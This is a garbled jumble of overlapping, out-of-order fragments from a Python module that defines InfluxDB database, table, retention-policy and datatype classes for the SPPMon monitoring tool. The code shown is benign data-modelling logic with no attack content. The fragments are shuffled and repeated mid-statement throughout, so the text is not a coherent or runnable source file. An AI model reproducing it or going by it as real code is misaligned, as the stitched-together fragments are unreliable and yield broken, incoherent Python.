raise ValueError(\"need str name to create table\") if(not time_key):", "elif(key is time_stamp_field): time_overwrite_allowed: bool = False time_stamp = value", "self.__fields @property def tags(self) -> List[str]: \"\"\"tags of the table,", "fill dicts # table.fields is a dict, we only need", "Database, duration: str, replication: int = 1, shard_duration: str =", "to only overwrite if it is not the time_stamp_field time_overwrite_allowed", "\"\"\" Represents a instance of influx database. Define all table", "self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication, 'default': self.default } def __str__(self)", "return self.name def __repr__(self) -> str: return f'Database: {self.name}' def", "if(value is None or (isinstance(value, str) and not value)): continue", "big use. Methods: get_auto_datatype - get Datatype enum by value", "Database: \"\"\" Represents a instance of influx database. Define all", "self.__tags @property def time_key(self) -> str: \"\"\"name of the timestamp", "a int, but a int is not a bool. Important:", "def name(self) -> str: \"\"\"name of the table\"\"\" return self.__name", "name is key, value is datatype\"\"\" return self.__fields @property def", "it was not defined. []-Access. Arguments: table_name {str} -- name", "-> List[str]: \"\"\"tags of the table, datatype always string\"\"\" return", "or counter. Caution: Type is just a placeholder, do not", "if(not time_key): raise ValueError(\"time key cannot be None\") if(not fields):", "-> Set[Queries.ContinuousQuery]: \"\"\"Set of all provided Continuous Queries\"\"\" return self.__continuous_queries", "self.__database __bad_measurement_characters: List[str] = [' ', ','] \"\"\"those chars need", "out of the values, able to compare to influxdb-created dict\"\"\"", "variable to only overwrite if it is not the time_stamp_field", "Raises: ValueError: If no dict is given or not of", "'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication, 'default': self.default } def __str__(self) ->", "return self.__tables @property def retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set of all", "this table\"\"\" return self.__retention_policy @property def database(self) -> Database: \"\"\"table", "is declared within this database Methods split_by_table_def - Split the", "Untested, saves as Boolean within Influx. \"\"\" INT = int", "{self.name}\" def __eq__(self, o: object) -> bool: if(isinstance(o, RetentionPolicy)): return", "all provided Continuous Queries Methods __getitem__ - [] access on", "automatically converted into second format. Note: The return type is", "duration: str, replication: int = 1, shard_duration: str = \"0s\",", "table if it was not defined. []-Access. Arguments: table_name {str}", "ExceptionUtils from utils.influx_utils import InfluxUtils from utils.spp_utils import SppUtils @unique", "only have 1 db instance so replication is always 1\"\"\"", "usage of method self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError", "pattern. Undeclared collums will produce a warning. This function uses", "be recorded as time time_stamp_field = self.time_key # helper variable", "to create a dict out of the values, able to", "'default': self.default } def __str__(self) -> str: return f\"{self.database.name}.{self.name}\" def", "continue # Otherwise check for Keys or Fields if(key in", "database): raise ValueError(\"need retention policy database for creation\") if(not duration):", "-> str: \"\"\"Size of memory-groups. Default time is 0s, then", "str: return f\"Retention Policy: {self.name}\" def __eq__(self, o: object) ->", "least one value in dict to split\") # if table", "saves as Boolean within Influx. \"\"\" INT = int \"\"\"Appends", "-> None: if(not name): raise ValueError(\"need retention policy name for", "return self.__continuous_queries @property def name(self) -> str: \"\"\"name of the", "a measurement/table name\"\"\" def __init__(self, database: Database, name: str, fields:", "= InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard", "# actualy timestamp saved time_stamp: Union[str, int, None] = None", "and not of a big use. Methods: get_auto_datatype - get", "Database: \"\"\"associated database\"\"\" return self.__database @property def duration(self) -> str:", "for Epoch timestamps, not duration or counter. Caution: Type is", "if(not mydict): raise ValueError(\"need at least one value in dict", "this is the default RP\"\"\" return self.__default def __init__(self, name:", "predefined set of tags and fields mydict {Dict[str, Any]} --", "default RP\"\"\" return self.__default def __init__(self, name: str, database: Database,", "data is mixed with any other type.\"\"\" FLOAT = float", "Size of memory-groups default - whether this is the default", "string\"\"\" return self.__tags @property def time_key(self) -> str: \"\"\"name of", "is highest priority. Do not overwrite it. elif(key is time_stamp_field):", "Dict[str, Union[str, int, bool]]: \"\"\"Used to create a dict out", "\"\"\" if(not mydict): raise ValueError(\"need at least one value in", "rp.default, database.retention_policies)) self.__database: Database = database self.__fields: Dict[str, Datatype] =", "ints are mixed with floats. If no type is detected", "dict out of the values \"\"\" @property def name(self) ->", "Table(self, table_name)) def __str__(self) -> str: return self.name def __repr__(self)", "chars need to be escaped within a measurement/table name\"\"\" def", "tables via name. Creates empty table if missing. \"\"\" @property", "None] = None for (key, value) in mydict.items(): # Ignore", "retention policy name for creation\") if(not database): raise ValueError(\"need retention", "recorded as time time_stamp_field = self.time_key # helper variable to", "format. Note: The return type is just a helper and", "self.__default def __init__(self, name: str, database: Database, duration: str, replication:", "or not of type dict. Returns: (Dict[str, Any], Dict[str, Any],", "Only use if no datatype is declared. It skips time-type", "name(self) -> str: \"\"\"name of the table\"\"\" return self.__name @property", "if(not replication): raise ValueError(\"need retention policy replication factor for creation\")", "if no datatype is declared. It skips time-type and fails", "is not defined use default split if(not self.fields): return InfluxUtils.default_split(mydict=mydict)", "The return type is just a helper and not of", "Table -- Instance of a predefined table, otherwise new empty", "no overwrite allowed, continue and drop field else: continue #", "field definitions. Attributes name - name of table fields -", "seconds. Important: Only use for Epoch timestamps, not duration or", "and returns `NONE`. Arguments: value {Union[str, float, int, bool, None]}", "type found for {value}\") return Datatype.NONE class RetentionPolicy: \"\"\"Represents a", "a warning and returns `NONE`. Arguments: value {Union[str, float, int,", "influx database. Classes: Datatype Database Table RetentionPolicy \"\"\" from __future__", "the timestamp key\"\"\" return self.__time_key @property def name(self) -> str:", "creation\") self.__name = name self.__database = database self.__replication = replication", "return self.__time_key @property def name(self) -> str: \"\"\"name of the", "if(not name): raise ValueError(\"need str name to create table\") if(not", "raise ValueError(\"need retention policy database for creation\") if(not duration): raise", "the data is purged replication - How often the date", "Caution: Type is just a placeholder, do not set to", "return hash(json.dumps(self.to_dict(), sort_keys=True)) class Table: \"\"\"Represents a measurement in influx.", "@property def continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set of all provided Continuous", "# str due usage of method self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration,", "str, fields: Dict[str, Datatype] = None, tags: List[str] = None,", "Attributes name - name of table fields - dict of", "it will split by a default pattern. Undeclared collums will", "not value)): continue # Check timestamp value if it matches", "except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration for retention", "ammount of time a dataset is deleted from the DB.", "List[str] = tags self.__time_key: str = time_key self.__retention_policy = retention_policy", "a dict out of the values \"\"\" @property def name(self)", "Represents a instance of influx database. Define all table definitions", "\"\"\"How often the date is replicated. We only have 1", "always 1\"\"\" return self.__replication @property def shard_duration(self) -> str: \"\"\"Size", "pre-defined tag and field definitions. Attributes name - name of", "timestamps, not duration or counter. Caution: Type is just a", "not of type dict. Returns: (Dict[str, Any], Dict[str, Any], int)", "int \"\"\"Appends a 'i' at end of number to declare.", "ExceptionUtils.error_message(f\"Not all columns for table {self.name} are declared: {key}\") #", "name of the table you want to aquire Returns: Table", "replicated shard_duration - Size of memory-groups default - whether this", "time_key): raise ValueError(\"time key cannot be None\") if(not fields): fields", "self.__name def __getitem__(self, table_name: str) -> Table: \"\"\"Aquire a instance", "# if no overwrite allowed, continue and drop field else:", "creation\") if(not database): raise ValueError(\"need retention policy database for creation\")", "tags): tags = [] if(not retention_policy): retention_policy = next(filter(lambda rp:", "self.__database: Database = database self.__fields: Dict[str, Datatype] = fields self.__tags:", "{name} is not in the correct time format\") def to_dict(self)", "\"\"\" @property def tables(self) -> Dict[str, Table]: \"\"\"Dict with table", "creation\") if(default is None): raise ValueError(\"need retention policy default setting", "are ignored. If there are no fields declared, it will", "str time_key - key name of the timestamp field retention_policy", "None) -> None: if(not database): raise ValueError(\"need database to create", "def tables(self) -> Dict[str, Table]: \"\"\"Dict with table definitions to", "instance of a predefined table, returns a empty table if", "returns a empty table if it was not defined. []-Access.", "if(not retention_policy): retention_policy = next(filter(lambda rp: rp.default, database.retention_policies)) self.__database: Database", "-- Table with predefined set of tags and fields mydict", "tags as list of str time_key - key name of", "return f'Database: {self.name}' def __init__(self, name: str): self.__name: str =", "object) -> bool: if(isinstance(o, RetentionPolicy)): return o.to_dict() == self.to_dict() return", "raise ValueError(\"need retention policy default setting for creation\") self.__name =", "Datatype] = fields self.__tags: List[str] = tags self.__time_key: str =", "<filename>python/influx/database_tables.py \"\"\"Provides all database and table structures used for the", "analysis. Usage should be avoided. Only use if no datatype", "def __repr__(self) -> str: return f'Database: {self.name}' def __init__(self, name:", "f\"Retention Policy: {self.name}\" def __eq__(self, o: object) -> bool: if(isinstance(o,", "Retention Policies continuous_queries - Set of all provided Continuous Queries", "-- Tuple of: tags, fields, timestamp \"\"\" if(not mydict): raise", "self.__tables: Dict[str, Table] = {} self.__retention_policies: Set[RetentionPolicy] = set() self.__continuous_queries:", "from utils.spp_utils import SppUtils @unique class Datatype(Enum): \"\"\" This enum", "access on the tables via name. Creates empty table if", "table, datatype always string\"\"\" return self.__tags @property def time_key(self) ->", "None]} -- Value to be analyzed Returns: Datatype -- type", "replicated. We only have 1 db instance so replication is", "in fields): fields[key] = value elif(key in tags): tags[key] =", "format\") def to_dict(self) -> Dict[str, Union[str, int, bool]]: \"\"\"Used to", "default pattern. Undeclared collums will produce a warning. This function", "analyzed Returns: Datatype -- type of value or `NONE`. \"\"\"", "name)): name = name.replace(bad_character, '\\\\%c'% bad_character) self.__name: str = name", "no dict is given or not of type dict. Returns:", "shard duration for creation\") if(default is None): raise ValueError(\"need retention", "only use `TIME` for epoch timestamps, *NOT* for durations or", "fields: Dict[str, Datatype] = None, tags: List[str] = None, time_key:", "declared within this database Methods split_by_table_def - Split the given", "of table fields - dict of field name with datatype", "if(isinstance(o, RetentionPolicy)): return o.to_dict() == self.to_dict() return False def __hash__(self)", "all provided Continuous Queries\"\"\" return self.__continuous_queries @property def name(self) ->", "fields[key] = value return (tags, fields, time_stamp) class Database: \"\"\"", "dict.fromkeys(self.fields.keys(), None) tags: Dict[str, Any] = dict.fromkeys(self.tags, None) # what", "ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention policy {name} is not in", "is detected emits a warning and returns `NONE`. Arguments: value", "- Size of memory-groups default - whether this is the", "fields): fields[key] = value elif(key in tags): tags[key] = value", "ValueError(\"need retention policy replication factor for creation\") if(not shard_duration): raise", "format\") try: # str due usage of method self.__shard_duration: str", "is just a placeholder, do not set to int -", "value elif(key in InfluxUtils.time_key_names or key in time_stamp_field): continue else:", "database and table structures used for the influx database. Classes:", "set of tags, fields and a timestamp. None-Values and empty", "right format. The order of the types within the enum", "escape not allowed characters in Measurement for bad_character in self.__bad_measurement_characters:", "self.__shard_duration @property def default(self) -> bool: \"\"\" whether this is", "definitions within the init method. Attributes name - name of", "shard_duration): raise ValueError(\"need retention policy shard duration for creation\") if(default", "self.__replication, 'default': self.default } def __str__(self) -> str: return f\"{self.database.name}.{self.name}\"", "datatype is declared. It skips time-type and fails if ints", "of a big use. Methods: get_auto_datatype - get Datatype enum", "no datatype is declared. It skips time-type and fails if", "import annotations from enum import Enum, unique import re import", "data in the right format. The order of the types", "mixed with floats. If no type is detected emits a", "-> Datatype: \"\"\"get Datatype enum by value typ analysis. Usage", "Arguments: self {Table} -- Table with predefined set of tags", "- creates a dict out of the values \"\"\" @property", "list of str time_key - key name of the timestamp", "helper and not of a big use. Methods: get_auto_datatype -", "have 1 db instance so replication is always 1\"\"\" return", "return self.__name @property def database(self) -> Database: \"\"\"associated database\"\"\" return", "default(self) -> bool: \"\"\" whether this is the default RP\"\"\"", "declared. It skips time-type and fails if ints are mixed", "declare. Fails if the data is mixed with any other", "import json from typing import Any, Dict, List, Set, Tuple,", "SPPMon will automatically insert the data in the right format.", "of the table you want to aquire Returns: Table --", "not set to int - causing problems! \"\"\" @staticmethod def", "is replicated shard_duration - Size of memory-groups default - whether", "of the timestamp key\"\"\" return self.__time_key @property def name(self) ->", "a instance of influx database. Define all table definitions within", "it is declared afer which ammount of time a dataset", "database duration - time until the data is purged replication", "or (isinstance(value, str) and not value)): continue # Check timestamp", "or `NONE`. \"\"\" for enum in Datatype: if(enum is Datatype.TIMESTAMP):", "name(self) -> str: \"\"\"name of the database, also used as", "continue # Check timestamp value if it matches any of", "# what field should be recorded as time time_stamp_field =", "Policy\"\"\" return self.__name @property def database(self) -> Database: \"\"\"associated database\"\"\"", "return enum ExceptionUtils.error_message(f\"No auto type found for {value}\") return Datatype.NONE", "insert the data in the right format. The order of", "\"\"\"Represents a influxdb retention policy. By this policy it is", "time a dataset is deleted from the DB. Attributes name", "retention policy database for creation\") if(not duration): raise ValueError(\"need retention", "a default pattern. Undeclared collums will produce a warning. This", "date is replicated shard_duration - Size of memory-groups default -", "- retention policy associated with this table database - table", "Any] = dict.fromkeys(self.fields.keys(), None) tags: Dict[str, Any] = dict.fromkeys(self.tags, None)", "key\"\"\" return self.__time_key @property def name(self) -> str: \"\"\"name of", "tags(self) -> List[str]: \"\"\"tags of the table, datatype always string\"\"\"", "policy shard duration for creation\") if(default is None): raise ValueError(\"need", "table\") if(not name): raise ValueError(\"need str name to create table\")", "get Datatype enum by value typ analysis \"\"\" NONE =", "database): raise ValueError(\"need database to create table\") if(not name): raise", "\"\"\"tags of the table, datatype always string\"\"\" return self.__tags @property", "fields mydict {Dict[str, Any]} -- dict with colums as keys.", "as Queries from utils.execption_utils import ExceptionUtils from utils.influx_utils import InfluxUtils", "or key in time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not all columns for", "__str__(self) -> str: return self.name def __repr__(self) -> str: return", "name self.__tables: Dict[str, Table] = {} self.__retention_policies: Set[RetentionPolicy] = set()", "- How often the date is replicated shard_duration - Size", "the table\"\"\" return self.__name @property def retention_policy(self) -> RetentionPolicy: \"\"\"retention", "def shard_duration(self) -> str: \"\"\"Size of memory-groups. Default time is", "retention_policy): retention_policy = next(filter(lambda rp: rp.default, database.retention_policies)) self.__database: Database =", "time time_stamp_field = self.time_key # helper variable to only overwrite", "enum in Datatype: if(enum is Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)): return", "set to int - causing problems! \"\"\" @staticmethod def get_auto_datatype(value:", "self.__replication @property def shard_duration(self) -> str: \"\"\"Size of memory-groups. Default", "are no fields declared, it will split by a default", "into seconds. Important: Only use for Epoch timestamps, not duration", "-> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str: return f\"Table:", "timestamp definiton declared within this table. Arguments: self {Table} --", "dict of field name with datatype tags - tags as", "the date is replicated. We only have 1 db instance", "@property def retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set of all provided Retention", "values, able to compare to influxdb-created dict\"\"\" return { 'name':", "\"\"\"Aquire a instance of a predefined table, returns a empty", "\"\"\" whether this is the default RP\"\"\" return self.__default def", "int - causing problems! \"\"\" @staticmethod def get_auto_datatype(value: Any) ->", "int. TODO Untested, saves as Boolean within Influx. \"\"\" INT", "','] \"\"\"those chars need to be escaped within a measurement/table", "table you want to aquire Returns: Table -- Instance of", "of all provided Continuous Queries Methods __getitem__ - [] access", "is a subtype of int. TODO Untested, saves as Boolean", "o: object) -> bool: if(isinstance(o, RetentionPolicy)): return o.to_dict() == self.to_dict()", "is the default RP Methods to_dict - creates a dict", "time-type and fails if ints are mixed with floats. If", "None-Values and empty strings are ignored. If there are no", "self.__name @property def database(self) -> Database: \"\"\"associated database\"\"\" return self.__database", "{key}\") # before key+\"MISSING\" : Removed to avoid death-circle on", "the tag/field and timestamp definiton declared within this table. Arguments:", "up\"\"\" return self.__tables @property def retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set of", "characters in Measurement for bad_character in self.__bad_measurement_characters: if(re.search(bad_character, name)): name", "RP database - associated database duration - time until the", "and not value)): continue # Check timestamp value if it", "not allowed characters in Measurement for bad_character in self.__bad_measurement_characters: if(re.search(bad_character,", "is the default RP\"\"\" return self.__default def __init__(self, name: str,", "type.\"\"\" FLOAT = float \"\"\"Unchanged value. Default Influx numeric data", "def fields(self) -> Dict[str, Datatype]: \"\"\"fields of the table, name", "repeated queries. fields[key] = value return (tags, fields, time_stamp) class", "Table: \"\"\"Aquire a instance of a predefined table, returns a", "strings are ignored. If there are no fields declared, it", "fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None) tags: Dict[str, Any] =", "declared afer which ammount of time a dataset is deleted", "raise ValueError(f\"duration for retention policy {name} is not in the", "tag/field and timestamp definiton declared within this table. Arguments: self", "purged replication - How often the date is replicated shard_duration", "time_stamp: Union[str, int, None] = None for (key, value) in", "Database Table RetentionPolicy \"\"\" from __future__ import annotations from enum", "placeholder, do not set to int - causing problems! \"\"\"", "get_auto_datatype - get Datatype enum by value typ analysis \"\"\"", "time format\") try: # str due usage of method self.__shard_duration:", "return self.__fields @property def tags(self) -> List[str]: \"\"\"tags of the", "split by a default pattern. Undeclared collums will produce a", "until the data is purged\"\"\" return self.__duration @property def replication(self)", "is not a bool. Important: only use `TIME` for epoch", "name with datatype tags - tags as list of str", "rp: rp.default, database.retention_policies)) self.__database: Database = database self.__fields: Dict[str, Datatype]", "is important: bool is a int, but a int is", "return False def __hash__(self) -> int: return hash(json.dumps(self.to_dict(), sort_keys=True)) class", "for bad_character in self.__bad_measurement_characters: if(re.search(bad_character, name)): name = name.replace(bad_character, '\\\\%c'%", "default split if(not self.fields): return InfluxUtils.default_split(mydict=mydict) # fill dicts #", "if the data is mixed with any other type.\"\"\" FLOAT", "ValueError(\"need retention policy duration for creation\") if(not replication): raise ValueError(\"need", "{} if(not tags): tags = [] if(not retention_policy): retention_policy =", "return { 'name': self.name, 'duration': self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication,", "Queries Methods __getitem__ - [] access on the tables via", "timestamp. None-Values and empty strings are ignored. If there are", "None: if(not database): raise ValueError(\"need database to create table\") if(not", "is just a helper and not of a big use.", "enum by value typ analysis. Usage should be avoided. Only", "key+\"MISSING\" : Removed to avoid death-circle on repeated queries. fields[key]", "InfluxUtils.time_key_names or key in time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not all columns", "= value # if no overwrite allowed, continue and drop", "with datatype tags - tags as list of str time_key", "it is a subtype of int. TODO Untested, saves as", "this policy it is declared afer which ammount of time", "List[str] = None, time_key: str = 'time', retention_policy: RetentionPolicy =", "always string\"\"\" return self.__tags @property def time_key(self) -> str: \"\"\"name", "bool. Important: only use `TIME` for epoch timestamps, *NOT* for", "\"\"\"time until the data is purged\"\"\" return self.__duration @property def", "return self.__database __bad_measurement_characters: List[str] = [' ', ','] \"\"\"those chars", "there are no fields declared, it will split by a", "name(self) -> str: \"\"\"name of the Retention Policy\"\"\" return self.__name", "time_stamp_field time_overwrite_allowed = True # actualy timestamp saved time_stamp: Union[str,", "just a placeholder, do not set to int - causing", "import Any, Dict, List, Set, Tuple, Union import influx.influx_queries as", "- associated database duration - time until the data is", "tags & fields retention_policies - Set of all provided Retention", "Any] = dict.fromkeys(self.tags, None) # what field should be recorded", "Otherwise check for Keys or Fields if(key in fields): fields[key]", "the DB. Attributes name - name of RP database -", "dict out of the values, able to compare to influxdb-created", "db decides what to take\"\"\" return self.__shard_duration @property def default(self)", "instance of influx database. Define all table definitions within the", "-> Dict[str, Datatype]: \"\"\"fields of the table, name is key,", "correct time format\") def to_dict(self) -> Dict[str, Union[str, int, bool]]:", "def __str__(self) -> str: return f\"{self.database.name}.{self.name}\" def __repr__(self) -> str:", "tags: List[str] = None, time_key: str = 'time', retention_policy: RetentionPolicy", "- table is declared within this database Methods split_by_table_def -", "no fields declared, it will split by a default pattern.", "and field definitions. Attributes name - name of table fields", "on repeated queries. fields[key] = value return (tags, fields, time_stamp)", "-> Table: \"\"\"Aquire a instance of a predefined table, returns", "values \"\"\" @property def name(self) -> str: \"\"\"name of the", "split if(not self.fields): return InfluxUtils.default_split(mydict=mydict) # fill dicts # table.fields", "time_stamp = value # if no overwrite allowed, continue and", "def continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set of all provided Continuous Queries\"\"\"", "\"\"\" @staticmethod def get_auto_datatype(value: Any) -> Datatype: \"\"\"get Datatype enum", "Retention Policy\"\"\" return self.__name @property def database(self) -> Database: \"\"\"associated", "Classes: Datatype Database Table RetentionPolicy \"\"\" from __future__ import annotations", "continue else: ExceptionUtils.error_message(f\"Not all columns for table {self.name} are declared:", "a bool. Important: only use `TIME` for epoch timestamps, *NOT*", "value return (tags, fields, time_stamp) class Database: \"\"\" Represents a", "allowed, continue and drop field else: continue # Otherwise check", "= database self.__fields: Dict[str, Datatype] = fields self.__tags: List[str] =", "we only need the keys fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(),", "None, tags: List[str] = None, time_key: str = 'time', retention_policy:", "usage of method self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError", "do not set to int - causing problems! \"\"\" @staticmethod", "replication self.__shard_duration = shard_duration self.__default = default try: # str", "By declaring the type SPPMon will automatically insert the data", "str, replication: int = 1, shard_duration: str = \"0s\", default:", "dict is given or not of type dict. Returns: (Dict[str,", "= tags self.__time_key: str = time_key self.__retention_policy = retention_policy #", "is a dict, we only need the keys fields: Dict[str,", "timestamp value if it matches any of predefined time names", "ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration for retention policy {name} is not", "return self.__name @property def retention_policy(self) -> RetentionPolicy: \"\"\"retention policy associated", "`TIME` for epoch timestamps, *NOT* for durations or counts. `TIME`", "= int \"\"\"Appends a 'i' at end of number to", "defined. []-Access. Arguments: table_name {str} -- name of the table", "from __future__ import annotations from enum import Enum, unique import", "time_key: str = 'time', retention_policy: RetentionPolicy = None) -> None:", "of method self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError as", "use for Epoch timestamps, not duration or counter. Caution: Type", "-- type of value or `NONE`. \"\"\" for enum in", "retention policy duration for creation\") if(not replication): raise ValueError(\"need retention", "the time_stamp_field time_overwrite_allowed = True # actualy timestamp saved time_stamp:", "(isinstance(value, str) and not value)): continue # Check timestamp value", "policy associated with this table database - table is declared", "datatype always string\"\"\" return self.__tags @property def time_key(self) -> str:", "a measurement in influx. Contains pre-defined tag and field definitions.", "only overwrite if it is not the time_stamp_field time_overwrite_allowed =", "of memory-groups. Default time is 0s, then the db decides", "no type is detected emits a warning and returns `NONE`.", "then the db decides what to take\"\"\" return self.__shard_duration @property", "types within the enum is important: bool is a int,", "Methods __getitem__ - [] access on the tables via name.", "measurement/table name\"\"\" def __init__(self, database: Database, name: str, fields: Dict[str,", "time_key self.__retention_policy = retention_policy # escape not allowed characters in", "\"0s\", default: bool = False) -> None: if(not name): raise", "enum differentiates between the different Influx-Types. By declaring the type", "Returns: (Dict[str, Any], Dict[str, Any], int) -- Tuple of: tags,", "database self.__replication = replication self.__shard_duration = shard_duration self.__default = default", "provided Retention Policies continuous_queries - Set of all provided Continuous", "__init__(self, name: str): self.__name: str = name self.__tables: Dict[str, Table]", "= {} if(not tags): tags = [] if(not retention_policy): retention_policy", "\"\"\"Appends a 'i' at end of number to declare. Fails", "def name(self) -> str: \"\"\"name of the database, also used", "produce a warning. This function uses the tag/field and timestamp", "if(not database): raise ValueError(\"need retention policy database for creation\") if(not", "= str \"\"\"Special symbols and \\\" will be escaped.\"\"\" BOOL", "placeholder.\"\"\" STRING = str \"\"\"Special symbols and \\\" will be", "str = time_key self.__retention_policy = retention_policy # escape not allowed", "raise ValueError(\"need database to create table\") if(not name): raise ValueError(\"need", "{Union[str, float, int, bool, None]} -- Value to be analyzed", "not defined. []-Access. Arguments: table_name {str} -- name of the", "raise ValueError(\"need retention policy shard duration for creation\") if(default is", "name of the timestamp field retention_policy - retention policy associated", "yet, overwrite sppmonCaptureTime or others elif(time_overwrite_allowed): time_stamp = value #", "database.retention_policies)) self.__database: Database = database self.__fields: Dict[str, Datatype] = fields", "None for (key, value) in mydict.items(): # Ignore empty entrys", "name): raise ValueError(\"need retention policy name for creation\") if(not database):", "the given dict into a pre-defined set of tags, fields", "detected emits a warning and returns `NONE`. Arguments: value {Union[str,", "this is the default RP Methods to_dict - creates a", "return self.tables.get(table_name, Table(self, table_name)) def __str__(self) -> str: return self.name", "@property def tags(self) -> List[str]: \"\"\"tags of the table, datatype", "\"\"\"name of the table\"\"\" return self.__name @property def retention_policy(self) ->", "aware it is a subtype of int. TODO Untested, saves", "Fails if the data is mixed with any other type.\"\"\"", "Removed to avoid death-circle on repeated queries. fields[key] = value", "provided Retention Policies\"\"\" return self.__retention_policies @property def continuous_queries(self) -> Set[Queries.ContinuousQuery]:", "duration): raise ValueError(\"need retention policy duration for creation\") if(not replication):", "in the correct time format\") def to_dict(self) -> Dict[str, Union[str,", "= type(None) \"\"\"Undeclared, only use as a placeholder.\"\"\" STRING =", "this table. Arguments: self {Table} -- Table with predefined set", "- key name of the timestamp field retention_policy - retention", "= 'time', retention_policy: RetentionPolicy = None) -> None: if(not database):", "is datatype\"\"\" return self.__fields @property def tags(self) -> List[str]: \"\"\"tags", "str = \"0s\", default: bool = False) -> None: if(not", "at end of number to declare. Fails if the data", "table is not defined use default split if(not self.fields): return", "keys fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None) tags: Dict[str, Any]", "value) in mydict.items(): # Ignore empty entrys if(value is None", "InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration", "defined use default split if(not self.fields): return InfluxUtils.default_split(mydict=mydict) # fill", "Set, Tuple, Union import influx.influx_queries as Queries from utils.execption_utils import", "as Boolean within Influx. \"\"\" INT = int \"\"\"Appends a", "Dict[str, Any]) -> Tuple[ Dict[str, Any], Dict[str, Any], Union[str, int,", "Attributes name - name of the database tables - tables", "policy. By this policy it is declared afer which ammount", "this table database - table is declared within this database", "__hash__(self) -> int: return hash(json.dumps(self.to_dict(), sort_keys=True)) class Table: \"\"\"Represents a", "self.__time_key: str = time_key self.__retention_policy = retention_policy # escape not", "declaring the type SPPMon will automatically insert the data in", "declared within this table. Arguments: self {Table} -- Table with", "within this database\"\"\" return self.__database __bad_measurement_characters: List[str] = [' ',", "of tags, fields and a timestamp. \"\"\" @property def fields(self)", "Queries\"\"\" return self.__continuous_queries @property def name(self) -> str: \"\"\"name of", "numeric data type. Mixing with ints works.\"\"\" TIMESTAMP = type(int)", "Ignore empty entrys if(value is None or (isinstance(value, str) and", "names if(key in time_stamp_field or key in InfluxUtils.time_key_names): # sppmonCTS", "-> str: return f\"Table: {self.name}\" def split_by_table_def(self, mydict: Dict[str, Any])", "missing. \"\"\" @property def tables(self) -> Dict[str, Table]: \"\"\"Dict with", "for durations or counts. `TIME` is automatically converted into second", "fields, time_stamp) class Database: \"\"\" Represents a instance of influx", "dict into a pre-defined set of tags, fields and a", "= next(filter(lambda rp: rp.default, database.retention_policies)) self.__database: Database = database self.__fields:", "for epoch timestamps, *NOT* for durations or counts. `TIME` is", "for creation\") if(not database): raise ValueError(\"need retention policy database for", "for retention policy {name} is not in the correct time", "List, Set, Tuple, Union import influx.influx_queries as Queries from utils.execption_utils", "if table is not defined use default split if(not self.fields):", "field should be recorded as time time_stamp_field = self.time_key #", "True # actualy timestamp saved time_stamp: Union[str, int, None] =", "all provided Retention Policies continuous_queries - Set of all provided", "of value or `NONE`. \"\"\" for enum in Datatype: if(enum", "\"\"\"Unchanged value. Default Influx numeric data type. Mixing with ints", "def database(self) -> Database: \"\"\"table is declared within this database\"\"\"", "Keys or Fields if(key in fields): fields[key] = value elif(key", "Set of all provided Continuous Queries Methods __getitem__ - []", "ValueError(\"need at least one value in dict to split\") #", "Influx numeric data type. Mixing with ints works.\"\"\" TIMESTAMP =", "the values \"\"\" @property def name(self) -> str: \"\"\"name of", "if(key in time_stamp_field or key in InfluxUtils.time_key_names): # sppmonCTS has", "\"\"\"Set of all provided Continuous Queries\"\"\" return self.__continuous_queries @property def", "\"\"\" INT = int \"\"\"Appends a 'i' at end of", "(tags, fields, time_stamp) class Database: \"\"\" Represents a instance of", "the table you want to aquire Returns: Table -- Instance", "type SPPMon will automatically insert the data in the right", "continuous_queries - Set of all provided Continuous Queries Methods __getitem__", "create table\") if(not time_key): raise ValueError(\"time key cannot be None\")", "on the tables via name. Creates empty table if missing.", "type is just a helper and not of a big", "shard_duration - Size of memory-groups default - whether this is", "str: \"\"\"name of the Retention Policy\"\"\" return self.__name @property def", "int) -- Tuple of: tags, fields, timestamp \"\"\" if(not mydict):", "def retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set of all provided Retention Policies\"\"\"", "warning and returns `NONE`. Arguments: value {Union[str, float, int, bool,", "# sppmonCTS has lowest priority, only set if otherwise None", "\"\"\" return self.tables.get(table_name, Table(self, table_name)) def __str__(self) -> str: return", "database for creation\") if(not duration): raise ValueError(\"need retention policy duration", "Tuple[ Dict[str, Any], Dict[str, Any], Union[str, int, None]]: \"\"\"Split the", "Attributes name - name of RP database - associated database", "ValueError(f\"shard duration for retention policy {name} is not in the", "return (tags, fields, time_stamp) class Database: \"\"\" Represents a instance", "whether this is the default RP\"\"\" return self.__default def __init__(self,", "# if time_stamp_field is not used yet, overwrite sppmonCaptureTime or", "priority. Do not overwrite it. elif(key is time_stamp_field): time_overwrite_allowed: bool", "for creation\") if(default is None): raise ValueError(\"need retention policy default", "the table, datatype always string\"\"\" return self.__tags @property def time_key(self)", "Enum, unique import re import json from typing import Any,", "[' ', ','] \"\"\"those chars need to be escaped within", "int is not a bool. Important: only use `TIME` for", "dict. Returns: (Dict[str, Any], Dict[str, Any], int) -- Tuple of:", "so replication is always 1\"\"\" return self.__replication @property def shard_duration(self)", "self.__name: str = name def __str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\"", "a pre-defined set of tags, fields and a timestamp. 